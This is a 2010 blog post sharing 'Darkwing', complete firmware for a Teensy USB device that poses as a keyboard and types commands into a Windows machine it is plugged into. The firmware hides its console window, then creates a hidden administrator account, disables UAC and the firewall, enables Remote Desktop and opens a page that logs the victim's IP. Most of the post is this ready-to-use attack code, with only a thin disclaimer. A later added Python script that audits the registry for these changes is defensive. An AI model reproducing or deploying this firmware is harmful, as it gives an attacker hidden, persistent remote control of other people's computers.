The Unstoppable Windows Hacking Device
by Hans Kokx on Aug.16, 2010, under Security, Visitor Favorite, Windows
Next in a long run of Windows hacks, we have a device that cannot easily be blocked by software and is fully customizable. The Teensy 2.0 (purchased for $18 at www.pjrc.com) is an Arduino-like microcontroller that can be programmed to act as a keyboard once plugged in. The device and vendor IDs can be changed at will, making it extremely difficult to block as a single device. (I, myself, have mine identifying as an Apple Pro Keyboard, as it requires no drivers in Linux, Mac OS X, or Windows, and doesn't prompt OS X to identify an unknown keyboard.) There is an application out there that takes inventory of your USB devices and monitors for, and blocks, new devices, but unless you have this highly obscure program running, you are likely to fall victim to this device.
Once properly programmed (using either C++ or the Arduino IDE), the Teensy can spew text as a normal keyboard would, but at rates much higher than anyone can accurately type. Entire batch scripts, full sets of commands, and anything else you can think of (including mouse movements) can be programmed in. Using this method, you can open a back door right into any Windows machine (or a Mac or Linux box, although those are somewhat more difficult due to the security mechanisms built in and require a bit of social engineering; we'll take a look at those at a later date).
The following is a script I've put together called Darkwing. (Named after the duck, of course, and because, until recently, my Teensy was housed inside of a rubber duck squeaky toy, as first designed by Hak5's Darren Kitchen.)
```cpp
// Darkwing v0.1
// USB Ducky Framework for the Teensy 2.0
// by HaDAk
// for the Hak.5 Community -- please contribute, distribute, and credit!

// Variables
int blinkcount = 0;

// OS X payloads
char* osx_ips = "ifconfig";

// *nix payloads
char* nix_ips = "ifconfig";

// Windows Payloads
// Add user "backdoor" with password "p@$$w0rd",
// add to the local admin group, and hide from the login screen
char* win_adduser = "net user backdoor p@$$w0rd /add && REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /V backdoor /T REG_DWORD /F /D \"0\" && net localgroup \"Administrators\" backdoor /ADD";

// Disable UAC
char* win_disableuac = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v EnableLUA /t REG_DWORD /d 0 /f";

// Enable Remote Desktop
char* win_enablerdp = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f";

// Disable Windows Firewall
char* win_disablefirewall = "netsh firewall set opmode disable";

// Launch their browser to your favorite website -- I use this to collect their IP and other system metrics
char* win_launchwebsite = "start /min www.hadak.org/pwnd-by-a-ducky";

void setup() {
  // Blink when the ducky is first plugged in, to verify power to it.
  while(blinkcount < 2){
    blink(50);
    blinkcount++;
  }

  // Windows generally needs a longer delay to enumerate the device. 3000ms is
  // typically sufficient, depending on the speed of the machine. Additionally,
  // the first time the device is plugged in, Windows will need a while to
  // install drivers. To avoid a really high delay, I recommend unplugging the
  // Ducky, letting Windows install the drivers, then replugging it.
  // The value will probably vary by machine, so experiment to find what works.
  delay(3000);
  blink(50);

  // Vile's better command line: http://www.hak5.org/forums/index.php?showtopic=16505
  RunWinUACCommand("cmd /Q /D /T:7F /F:OFF /V:OFF /K \"@echo off && mode con:RATE=31 DELAY=0 && mode con:COLS=15 LINES=1 && title . && cls\"");
  //RunGnomeKDECommand("xterm");   // Linux (Gnome/KDE) command line example
  //RunOSXCommand("Terminal.app"); // OS X Command line example

  delay(500);

  // Move window off screen
  win_MoveWindow();

  // Administer payload(s)
  Keyboard.print(win_disableuac);
  enter();
  Keyboard.print(win_adduser);
  enter();
  Keyboard.print(win_enablerdp);
  enter();
  Keyboard.print(win_disablefirewall);
  enter();
  Keyboard.print(win_launchwebsite);
  enter();
  Keyboard.print("exit");
  enter();
}

void loop() {
  blink(400);
}

void blink(int time){
  pinMode( PIN_D6, OUTPUT );  // set LED to super bright
  digitalWrite(PIN_D6, HIGH); // LED on
  delay(time);                // Slow blink
  digitalWrite(PIN_D6, LOW);  // LED off
  delay(time);
}

void enter(){
  // Press the enter key, and release it
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void RunGnomeKDECommand(char *cmd){
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_F2);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(500);
  Keyboard.print(cmd);
  enter();
}

void RunOSXCommand(char *cmd){
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(500);
  Keyboard.print(cmd);
  delay(500);
  enter();
}

void RunWindowsCommand(char *cmd){
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(500);
  Keyboard.print(cmd);
  enter();
}

void RunWinUACCommand(char *cmd){
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(50);
  Keyboard.print(cmd);
  Keyboard.set_modifier(MODIFIERKEY_CTRL|MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  enter();
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  delay(500);
  Keyboard.set_modifier(KEY_RIGHT);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  enter();
}

void win_MoveWindow(){
  int move = 0;
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.print("m");
  while(move < 250){
    Keyboard.set_key1(KEY_DOWN);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
    move++;
  }
  enter();
}
```
Darkwing contains several functions to make your life much easier when writing scripts: opening a UAC command line in Windows Vista and 7, moving a window to the bottom of the screen so it's out of sight, and running applications in Windows, Mac OS X, and Linux (Gnome and KDE, or whatever else uses the Alt+F2 launcher).
The payloads included with Darkwing will add an administrative user to Windows, hide it from the login screen, disable the firewall, disable UAC, and enable remote desktop. A future revision of this script will reside in a Windows script with several executables, but that's a post for another day.
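Each of those payload effects leaves a specific registry trace, which a host check can look for after the fact. The following is an added example, not part of Darkwing: it audits the values the post's payloads set (EnableLUA, fDenyTSConnections, and SpecialAccounts\UserList entries of 0, which hide an account from the logon screen) plus the per-profile EnableFirewall values, which the post does not name but are the standard location for firewall profile state. The reader-callback design is an assumption so the same logic runs live on Windows through winreg or offline against a constructed snapshot.

```python
# HKLM subkeys changed by the post's win_disableuac, win_enablerdp and
# win_adduser payloads. The firewall profile keys are not quoted on the page;
# they are the standard locations where Windows keeps per-profile state.
UAC_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
RDP_KEY = r"SYSTEM\CurrentControlSet\Control\Terminal Server"
USERLIST_KEY = (r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
                r"\SpecialAccounts\UserList")
FW_KEY = (r"SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters"
          r"\FirewallPolicy\%sProfile")
FW_PROFILES = ("Domain", "Standard", "Public")

def audit(read_values):
    """read_values(subkey) -> {value_name: data} for an HKLM subkey ({} if
    absent). Returns the findings as a list of strings."""
    findings = []
    if read_values(UAC_KEY).get("EnableLUA") == 0:
        findings.append("UAC disabled: EnableLUA=0")
    if read_values(RDP_KEY).get("fDenyTSConnections") == 0:
        findings.append("Remote Desktop enabled: fDenyTSConnections=0")
    for name, data in read_values(USERLIST_KEY).items():
        if data == 0:  # 0 hides the account from the logon screen
            findings.append(f"account hidden from logon screen: {name}")
    for profile in FW_PROFILES:
        if read_values(FW_KEY % profile).get("EnableFirewall") == 0:
            findings.append(f"firewall disabled: {profile} profile")
    return findings

def winreg_reader(subkey):
    """Live reader for Windows hosts (stdlib winreg; absent key -> {})."""
    import winreg
    values, i = {}, 0
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as key:
            while True:
                name, data, _ = winreg.EnumValue(key, i)
                values[name] = data
                i += 1
    except OSError:  # key missing, or EnumValue ran past the last value
        pass
    return values

# Constructed registry snapshot mirroring what Darkwing's payloads leave behind.
SAMPLE_SNAPSHOT = {
    UAC_KEY: {"EnableLUA": 0},
    RDP_KEY: {"fDenyTSConnections": 0},
    USERLIST_KEY: {"backdoor": 0},
    FW_KEY % "Standard": {"EnableFirewall": 0},
}
```

On a Windows host call `audit(winreg_reader)`; offline, `audit(lambda k: SAMPLE_SNAPSHOT.get(k, {}))` reports all four findings.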
For now, I am releasing the current incarnation of my script into the wild with the same disclaimer as always: this hack is meant to raise awareness of the inherent insecurities of computer systems, particularly Windows, and ideally to nudge Microsoft into creating a more secure computing environment. Please do NOT use this script or any information here for illegal purposes, as I am NOT responsible for your actions.
